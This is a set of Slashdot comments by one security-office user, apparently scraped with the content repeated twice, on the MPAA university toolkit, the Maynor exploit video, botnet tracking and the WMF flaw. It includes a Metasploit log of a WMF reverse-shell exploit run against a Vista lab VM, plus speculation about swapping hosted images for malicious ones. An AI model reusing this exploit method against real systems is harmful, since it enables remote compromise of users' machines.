"Hopefully more data can be gathered and published showing not only what the real numbers are, but how the RIAA/MPAA get their numbers"
This is what I am hoping. I have no idea how the **AAs get their numbers. The numbers from the leaked mediadefender emails are just a small sample but I hope this sparks some interest in someone finding out what the numbers really are.
They are using an old version of snort that has vulnerabilities. I didn't realize the version of snort they are running is from over two years ago!
I sure hope this version they are running isn't vulnerable to this. http://www.kb.cert.org/vuls/id/175500 If so, someone could totally own the box and sniff whatever traffic they want to. All of it including the content.
This tool they are talking about includes numerous network based tools they want Universities to install on their network. These tools CAN NOT detect ILLEGAL file sharing. They can only detect that file sharing is taking place. So what are Universities supposed to do? Watch the logs and when someone shares a file launch a raid on their room to check and see if that file was illegal or not? This is ridiculous.
Now the scary part. The Universitytoolkit is setup by default to allow unauthenticated access to the tools on the box via a web application. Someone from the network can anonymously view ALL traffic this system can see which includes web traffic, etc. If anyone has installed this toolkit you might want to do some more research.
Now wait a minute! Wouldn't Prince be happy that this mother has PURCHASED one of his CDs?! The quality of the sound on the video could hardly hurt his sales. If anything it would increase them. Maybe that is why he raised such a stink in the first place. Hoping to get some controversy started and him being in the spotlight would generate more sales. I just lost all kinds of respect for him.
Prince!! HAVE YOU LOST YOUR MIND?!
During the actual exploit didn't you notice the MAC address was not a third party but was one for Apple?
IP Address was 192.168.1.50
MAC address was 00:17:F2:41:31:6D
MAC Address
Prefix Vendor
0017F2 Apple Computer
This was covered but a lot of people either didn't see it or just chose to ignore it. I am going to bet he did that ifconfig on purpose knowing that people that really pay attention will see that. Or he did that to just throw confusion in the whole deal.
http://www.smallworks.com/archives/00000461.htmhttp://www.smallworks.com/~jim/maynor_exploit_video.mov
And for a little humour
me$ whois microsoftie.com
Registrant:
Microsoft Corporation
One Microsoft Way
Redmond, WA 98052
US
Domain name: MICROSOFTIE.COM
Administrative Contact:
Administrator, Domain domains@microsoft.com
One Microsoft Way
Redmond, WA 98052
US
+1.4258828080
Research and learning is what we are about and I don't see that content such as this will ever be blocked. MP3s can be used for more than just music. It can also be used for presentations of useful information. There are other ways to deal with bandwidth problem such as throttling (if that is their concern) but that would then impact the speedy delivery of information they need to obtain. Maybe they need a more robust connection to the Internet.
Wow, I didn't even know this article was going to be published. I actually sent him documentation I created to help him get the honeypot setup. Seems they did a REALLY good job with it!
I'm kind of thinking a small mention with kudos to me in the article would have been nice but I'm not going to lose any sleep over it. The honeypot idea originated after I had followed a BOT to a Botnet controller that Diabl0 was 'managing' and they did a story on it. So they wanted to setup their own honeypot. It would have been nice if he at least sent me and email saying the story was coming out.:(
Another thing to think about with this type of exploit is what the future will hold for us. Since we already know that in the future there will be new vulnerabilities discovered in image viewers, media players, flash players, etc, evil people will begin to distribute embedded links to files in advance where they can then come back later if an exploit is released and replace the file with a malicious one. For instance, if you create all those cute flashy images that myspacers seem to use in comments and host them on a site later you can come back and simply replace the image with an evil one. Same goes for shockwave or other media files as well.
Just something to think about!
Ever tried to track these guys down? Have at it and let us know what you find out. =)
First of all the term 'our authorities' sticks out. There isn't a single jurisdiction for this type of crime. A lot of these botnet operators live overseas and are hard to track down. Then if they do actually find them there are a lot of hurdles to jump through. The number of botnets is growing every day and I would guess that the number of law enforcment that deal with cybercrimes isn't growing at the same pace. This is already a huge problem and I would imagine it will only get worse.
When you chase these botnet conrollers down you may find the operator in a channel on the server but normally they hide their real IP address. There is only so much you can do if you don't have access to the actual system the IRC server is located on. And even then it could be difficult to actually find them because they could be proxying through another hacked machine.
Yea, someone else ended up saying the same thing and is rated 'insightful' and mine 'off topic'. go figure that out.
anyways, a single infection on a network can cause a lot of grief if they have departmental shared network drives. would be good to make sure the backup of server shares is complete before midnight on Feb 02.
"will not release a patch until its regular monthly patch release "
Someone should have researched this a bit before approving it. Microsoft has no obligation to patch this. This is a worm that relies mainly on user's opening up an evil email attachment. What is M$ supposed to patch? The end-user?
Yes, I did order Macs for all of our staff (except for one that already has a Mac) so that means we will have 4 Macs in the office.
I have used Microsoft since Dos 4.0 as well as other operating systems. This is the first time I got nervous just surfing the web. There have always been some kind of workaround. In this case there wasn't a good workaround for the zero day exploits that were all over the place. The crappy workaround M$ recommended wasn't a good workaround at all. If you disabled the crappy dll they suggested it is still possible for you to get compromised. There has been talk that some other programs would re-registere the crappy dll and any images you had stored in memory would be executed. Microsoft downplayed this just a bit too much for me. We have over 35,000 computers and we had students coming back the Friday before patch-tuesday. So, this was pretty bad. They did end up releasing the patch that Friday. Okay, I can live with that. *whew*
Now, the fact that this same vulnerability was found in the new and secure Windows Vista just did it for me. That was the point I stopped being a Microsoft advocate.
I posted something about Vista being vulnerable to the WMF thing in a Vista Kernel post here not long ago. They got a little mad at me but that is okay. Everyone has to be mad at someone!
People were telling me you can't automatically exploit it but I fired up metasploit and was successful with the admin account and a non-priv account.
Administrator
msf ie_xp_pfv_metafile(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://10.1.1.101:8080/ [*] HTTP Client connected from 10.1.1.106:49450, redirecting... [*] HTTP Client connected from 10.1.1.106:49451, redirecting... [*] HTTP Client connected from 10.1.1.106:49452, redirecting... [*] HTTP Client connected from 10.1.1.106:49453, sending 1864 bytes of payload... [*] Got connection from 10.1.1.101:4321 10.1.1.106:49454
Microsoft Windows [Version 6.0.5112] (C) Copyright 1985-2005 Microsoft Corp.
E:\Users\Administrator\Desktop>
Test account
msf ie_xp_pfv_metafile(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://10.1.1.101:8080/ [*] HTTP Client connected from 10.1.1.106:49487, redirecting... [*] HTTP Client connected from 10.1.1.106:49488, redirecting... [*] HTTP Client connected from 10.1.1.106:49489, sending 1864 bytes of payload... [*] Got connection from 10.1.1.101:4321 10.1.1.106:49490
Microsoft Windows [Version 6.0.5112] (C) Copyright 1985-2005 Microsoft Corp.
E:\Users\test\Desktop>
I am wondering what else they are going to import from the old technology. I was a Windows fan up until this WMF dealio. I work in an Information Security office and all of our staff are going to Mac. Ordered them Friday!
I just rolled back my Vista VMWare (Microsoft Windows [Version 6.0.5112]) guest and created a new account called 'test' and logged into it. I went to http://sipr.net/%5Bremove%5Dtest.wmf which is a test that will see if your system is vulnerable. As soon as I loaded the page Microsoft Picture Viewer popped up and then calculator popped up. Then Internet Explorer crashed.
So, the code in the WMF file was executed under a normal user and brought up calculator and then crashed explorer.
I was using VMWare and last night when I retested under another account I'm can't remember if I had rolled back the snapshot. I'll try this again today if I get a chance. It is still bad if M$ is bringing in older technology that may have problems like this. The fact still remains that Windows Vista is vulnerable to this even if it is only under the Administrator account.
Slashdot Mirror
"Hopefully more data can be gathered and published showing not only what the real numbers are, but how the RIAA/MPAA get their numbers"
This is what I am hoping. I have no idea how the **AAs get their numbers. The numbers from the leaked mediadefender emails are just a small sample but I hope this sparks some interest in someone finding out what the numbers really are.
I just now realized I don't know what "Score:5, Informative" means on /. anymore. Shouldn't this be rated 'funny'?
Some interesting facts.
http://taosecurity.blogspot.com/2007/11/examining-mpaa-university-toolkit.html
They are using an old version of snort that has vulnerabilities. I didn't realize the version of snort they are running is from over two years ago!
I sure hope this version they are running isn't vulnerable to this. http://www.kb.cert.org/vuls/id/175500 If so, someone could totally own the box and sniff whatever traffic they want to. All of it including the content.
http://listserv.educause.edu/cgi-bin/wa.exe?A2=ind0711&L=icpl&T=0&F=&S=&P=546
This tool they are talking about includes numerous network based tools they want Universities to install on their network. These tools CAN NOT detect ILLEGAL file sharing. They can only detect that file sharing is taking place. So what are Universities supposed to do? Watch the logs and when someone shares a file launch a raid on their room to check and see if that file was illegal or not? This is ridiculous.
Now the scary part. The Universitytoolkit is setup by default to allow unauthenticated access to the tools on the box via a web application. Someone from the network can anonymously view ALL traffic this system can see which includes web traffic, etc. If anyone has installed this toolkit you might want to do some more research.
Here, download my music. It is free!
GarageBand.com has a TON of great free music. Most allow download of the MP3 as well.
Garageband
The RIAA didn't ask for $220,000. The stupid jurors came up with that number.
Now wait a minute! Wouldn't Prince be happy that this mother has PURCHASED one of his CDs?! The quality of the sound on the video could hardly hurt his sales. If anything it would increase them. Maybe that is why he raised such a stink in the first place. Hoping to get some controversy started and him being in the spotlight would generate more sales. I just lost all kinds of respect for him. Prince!! HAVE YOU LOST YOUR MIND?!
holy crap. what a totally dumb ass move on VP's side. he needs some new lawyers and advisors. that is going to be a nightmare to his future sales!!!
JUST SHOW THE GODDAMN RECEIPT!! for christ's sake. This was stoopid.
During the actual exploit didn't you notice the MAC address was not a third party but was one for Apple? IP Address was 192.168.1.50 MAC address was 00:17:F2:41:31:6D MAC Address Prefix Vendor 0017F2 Apple Computer This was covered but a lot of people either didn't see it or just chose to ignore it. I am going to bet he did that ifconfig on purpose knowing that people that really pay attention will see that. Or he did that to just throw confusion in the whole deal. http://www.smallworks.com/archives/00000461.htm http://www.smallworks.com/~jim/maynor_exploit_video.mov And for a little humour me$ whois microsoftie.com Registrant: Microsoft Corporation One Microsoft Way Redmond, WA 98052 US Domain name: MICROSOFTIE.COM Administrative Contact: Administrator, Domain domains@microsoft.com One Microsoft Way Redmond, WA 98052 US +1.4258828080
Research and learning is what we are about and I don't see that content such as this will ever be blocked. MP3s can be used for more than just music. It can also be used for presentations of useful information. There are other ways to deal with bandwidth problem such as throttling (if that is their concern) but that would then impact the speedy delivery of information they need to obtain. Maybe they need a more robust connection to the Internet.
Wow, I didn't even know this article was going to be published. I actually sent him documentation I created to help him get the honeypot setup. Seems they did a REALLY good job with it! I'm kind of thinking a small mention with kudos to me in the article would have been nice but I'm not going to lose any sleep over it. The honeypot idea originated after I had followed a BOT to a Botnet controller that Diabl0 was 'managing' and they did a story on it. So they wanted to setup their own honeypot. It would have been nice if he at least sent me and email saying the story was coming out. :(
Another thing to think about with this type of exploit is what the future will hold for us. Since we already know that in the future there will be new vulnerabilities discovered in image viewers, media players, flash players, etc, evil people will begin to distribute embedded links to files in advance where they can then come back later if an exploit is released and replace the file with a malicious one. For instance, if you create all those cute flashy images that myspacers seem to use in comments and host them on a site later you can come back and simply replace the image with an evil one. Same goes for shockwave or other media files as well. Just something to think about!
TGIF is all i have to say. :)
too tired to be playing /. today i guess.
>linux viruses do not exist huh? Linux.Plupii Linux.Slapper.Worm Linux.Simile Linux.Backdoor.Kaiten just to name a few.
uhmmm.. the botnet dood didn't register this domain. Well, now poor Timothy is going to have a busy week.
Ever tried to track these guys down? Have at it and let us know what you find out. =) First of all the term 'our authorities' sticks out. There isn't a single jurisdiction for this type of crime. A lot of these botnet operators live overseas and are hard to track down. Then if they do actually find them there are a lot of hurdles to jump through. The number of botnets is growing every day and I would guess that the number of law enforcment that deal with cybercrimes isn't growing at the same pace. This is already a huge problem and I would imagine it will only get worse.
When you chase these botnet conrollers down you may find the operator in a channel on the server but normally they hide their real IP address. There is only so much you can do if you don't have access to the actual system the IRC server is located on. And even then it could be difficult to actually find them because they could be proxying through another hacked machine.
Sophos posted an advisory as well.. html
http://www.sophos.com/virusinfo/analyses/osxleapa
Yea, someone else ended up saying the same thing and is rated 'insightful' and mine 'off topic'. go figure that out. anyways, a single infection on a network can cause a lot of grief if they have departmental shared network drives. would be good to make sure the backup of server shares is complete before midnight on Feb 02.
"will not release a patch until its regular monthly patch release " Someone should have researched this a bit before approving it. Microsoft has no obligation to patch this. This is a worm that relies mainly on user's opening up an evil email attachment. What is M$ supposed to patch? The end-user?
Yes, I did order Macs for all of our staff (except for one that already has a Mac) so that means we will have 4 Macs in the office.
I have used Microsoft since Dos 4.0 as well as other operating systems. This is the first time I got nervous just surfing the web. There have always been some kind of workaround. In this case there wasn't a good workaround for the zero day exploits that were all over the place. The crappy workaround M$ recommended wasn't a good workaround at all. If you disabled the crappy dll they suggested it is still possible for you to get compromised. There has been talk that some other programs would re-registere the crappy dll and any images you had stored in memory would be executed. Microsoft downplayed this just a bit too much for me. We have over 35,000 computers and we had students coming back the Friday before patch-tuesday. So, this was pretty bad. They did end up releasing the patch that Friday. Okay, I can live with that. *whew*
Now, the fact that this same vulnerability was found in the new and secure Windows Vista just did it for me. That was the point I stopped being a Microsoft advocate.
Yours truly,
blast3r the newb
I posted something about Vista being vulnerable to the WMF thing in a Vista Kernel post here not long ago. They got a little mad at me but that is okay. Everyone has to be mad at someone!
People were telling me you can't automatically exploit it but I fired up metasploit and was successful with the admin account and a non-priv account.
Administrator
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49450, redirecting...
[*] HTTP Client connected from 10.1.1.106:49451, redirecting...
[*] HTTP Client connected from 10.1.1.106:49452, redirecting...
[*] HTTP Client connected from 10.1.1.106:49453, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49454
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\Administrator\Desktop>
Test account
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49487, redirecting...
[*] HTTP Client connected from 10.1.1.106:49488, redirecting...
[*] HTTP Client connected from 10.1.1.106:49489, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49490
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\test\Desktop>
I am wondering what else they are going to import from the old technology. I was a Windows fan up until this WMF dealio. I work in an Information Security office and all of our staff are going to Mac. Ordered them Friday!
I just rolled back my Vista VMWare (Microsoft Windows [Version 6.0.5112]) guest and created a new account called 'test' and logged into it. I went to http://sipr.net/%5Bremove%5Dtest.wmf which is a test that will see if your system is vulnerable. As soon as I loaded the page Microsoft Picture Viewer popped up and then calculator popped up. Then Internet Explorer crashed. So, the code in the WMF file was executed under a normal user and brought up calculator and then crashed explorer.
I was using VMWare and last night when I retested under another account I'm can't remember if I had rolled back the snapshot. I'll try this again today if I get a chance. It is still bad if M$ is bringing in older technology that may have problems like this. The fact still remains that Windows Vista is vulnerable to this even if it is only under the Administrator account.